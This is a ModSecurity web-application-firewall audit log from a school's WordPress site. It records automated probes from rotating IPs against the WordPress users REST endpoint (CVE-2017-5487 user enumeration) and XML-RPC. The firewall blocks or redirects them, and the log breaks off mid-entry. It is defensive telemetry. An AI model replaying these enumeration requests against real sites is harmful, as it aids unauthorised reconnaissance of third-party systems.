[17/May/2025:02:27:18 +0700] aCeRlse47ocjCGWTS4Y-5wAAAFI 103.236.140.4 53826 103.236.140.4 8181 --2ed51e21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ed51e21-C-- demo.sayHello --2ed51e21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ed51e21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423638909908 5808 (- - -) Stopwatch2: 1747423638909908 5808; combined=4303, p1=579, p2=3487, p3=34, p4=47, p5=93, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ed51e21-Z-- --7c4bdf5c-A-- [17/May/2025:02:28:31 +0700] aCeR39e6THFz1hsaJaLZCwAAAAE 103.236.140.4 53856 103.236.140.4 8181 --7c4bdf5c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c4bdf5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c4bdf5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423711358166 2885 (- - -) Stopwatch2: 1747423711358166 2885; combined=1278, p1=427, p2=820, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c4bdf5c-Z-- --9a007800-A-- [17/May/2025:02:28:39 +0700] aCeR59hEtho3ciA0wehdfAAAAJY 103.236.140.4 53860 103.236.140.4 8181 --9a007800-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a007800-C-- demo.sayHello --9a007800-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a007800-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423719807192 6895 (- - -) Stopwatch2: 1747423719807192 6895; combined=4854, p1=661, p2=3913, p3=37, p4=39, p5=118, sr=126, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a007800-Z-- --f56b652f-A-- [17/May/2025:02:28:49 +0700] aCeR8de6THFz1hsaJaLZDAAAABg 103.236.140.4 53868 103.236.140.4 8181 --f56b652f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f56b652f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f56b652f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423729601280 14697 (- - -) Stopwatch2: 1747423729601280 14697; combined=25932, p1=396, p2=792, p3=0, p4=0, p5=12386, sr=68, sw=0, l=0, gc=12358 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f56b652f-Z-- --3b97675f-A-- [17/May/2025:02:28:55 +0700] aCeR99hEtho3ciA0wehdgAAAAII 103.236.140.4 53872 103.236.140.4 8181 --3b97675f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.170 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b97675f-C-- demo.sayHello --3b97675f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b97675f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423735417814 6403 (- - -) Stopwatch2: 1747423735417814 6403; combined=4605, p1=647, p2=3723, p3=37, p4=41, p5=94, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b97675f-Z-- --7c9ded15-A-- [17/May/2025:02:29:46 +0700] aCeSKthEtho3ciA0wehdggAAAIc 103.236.140.4 53876 103.236.140.4 8181 --7c9ded15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c9ded15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c9ded15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423786346886 3505 (- - -) Stopwatch2: 1747423786346886 3505; combined=1450, p1=501, p2=917, p3=0, p4=0, p5=31, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c9ded15-Z-- --f9a4121b-A-- [17/May/2025:02:29:55 +0700] aCeSM8e47ocjCGWTS4Y-6wAAAEI 103.236.140.4 53880 103.236.140.4 8181 --f9a4121b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9a4121b-C-- demo.sayHello --f9a4121b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a4121b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423795001171 6161 (- - -) Stopwatch2: 1747423795001171 6161; combined=4496, p1=547, p2=3708, p3=32, p4=37, p5=101, sr=76, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a4121b-Z-- --4727bb5d-A-- [17/May/2025:02:29:55 +0700] aCeSM9e6THFz1hsaJaLZDQAAABY 103.236.140.4 53882 103.236.140.4 8181 --4727bb5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.40 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4727bb5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4727bb5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423795652903 2117 (- - -) Stopwatch2: 1747423795652903 2117; combined=951, p1=334, p2=597, p3=0, p4=0, p5=20, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4727bb5d-Z-- --eeed9530-A-- [17/May/2025:02:29:57 +0700] aCeSNdhEtho3ciA0wehdhQAAAIg 103.236.140.4 53890 103.236.140.4 8181 --eeed9530-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eeed9530-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eeed9530-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423797437020 2791 (- - -) Stopwatch2: 1747423797437020 2791; combined=1234, p1=421, p2=786, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eeed9530-Z-- --0f0c0e4f-A-- [17/May/2025:02:30:01 +0700] aCeSOdhEtho3ciA0wehdhwAAAJM 103.236.140.4 53894 103.236.140.4 8181 --0f0c0e4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.40 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f0c0e4f-C-- demo.sayHello --0f0c0e4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f0c0e4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423801918821 6422 (- - -) Stopwatch2: 1747423801918821 6422; combined=4538, p1=605, p2=3635, p3=41, p4=41, p5=128, sr=77, sw=88, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f0c0e4f-Z-- --6a384541-A-- [17/May/2025:02:30:04 +0700] aCeSPNe6THFz1hsaJaLZEAAAAAU 103.236.140.4 53900 103.236.140.4 8181 --6a384541-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a384541-C-- demo.sayHello --6a384541-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a384541-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423804618023 5476 (- - -) Stopwatch2: 1747423804618023 5476; combined=4096, p1=562, p2=3324, p3=28, p4=31, p5=89, sr=98, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a384541-Z-- --9523e345-A-- [17/May/2025:02:30:11 +0700] aCeSQ9hEtho3ciA0wehdiAAAAIw 103.236.140.4 53904 103.236.140.4 8181 --9523e345-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9523e345-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9523e345-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423811016857 3066 (- - -) Stopwatch2: 1747423811016857 3066; combined=1304, p1=463, p2=812, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9523e345-Z-- --a849d47a-A-- [17/May/2025:02:30:19 +0700] aCeSS9hEtho3ciA0wehdigAAAIY 103.236.140.4 53908 103.236.140.4 8181 --a849d47a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a849d47a-C-- demo.sayHello --a849d47a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a849d47a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423819664475 5655 (- - -) Stopwatch2: 1747423819664475 5655; combined=4183, p1=532, p2=3430, p3=32, p4=36, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a849d47a-Z-- --b1728272-A-- [17/May/2025:02:30:40 +0700] aCeSYNhEtho3ciA0wehdjQAAAJg 103.236.140.4 53924 103.236.140.4 8181 --b1728272-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1728272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1728272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423840764253 3375 (- - -) Stopwatch2: 1747423840764253 3375; combined=1463, p1=481, p2=937, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1728272-Z-- --2ab32f27-A-- [17/May/2025:02:30:45 +0700] aCeSZdhEtho3ciA0wehdjwAAAIM 103.236.140.4 53930 103.236.140.4 8181 --2ab32f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ab32f27-C-- demo.sayHello --2ab32f27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab32f27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423845949468 5657 (- - -) Stopwatch2: 1747423845949468 5657; combined=4130, p1=498, p2=3408, p3=28, p4=33, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ab32f27-Z-- --07d30834-A-- [17/May/2025:02:31:24 +0700] aCeSjNhEtho3ciA0wehdkgAAAIk 103.236.140.4 53936 103.236.140.4 8181 --07d30834-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07d30834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07d30834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423884303261 3047 (- - -) Stopwatch2: 1747423884303261 3047; combined=1241, p1=409, p2=803, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07d30834-Z-- --95f7fa31-A-- [17/May/2025:02:31:29 +0700] aCeSkdhEtho3ciA0wehdkwAAAIc 103.236.140.4 53940 103.236.140.4 8181 --95f7fa31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95f7fa31-C-- demo.sayHello --95f7fa31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95f7fa31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423889966869 6846 (- - -) Stopwatch2: 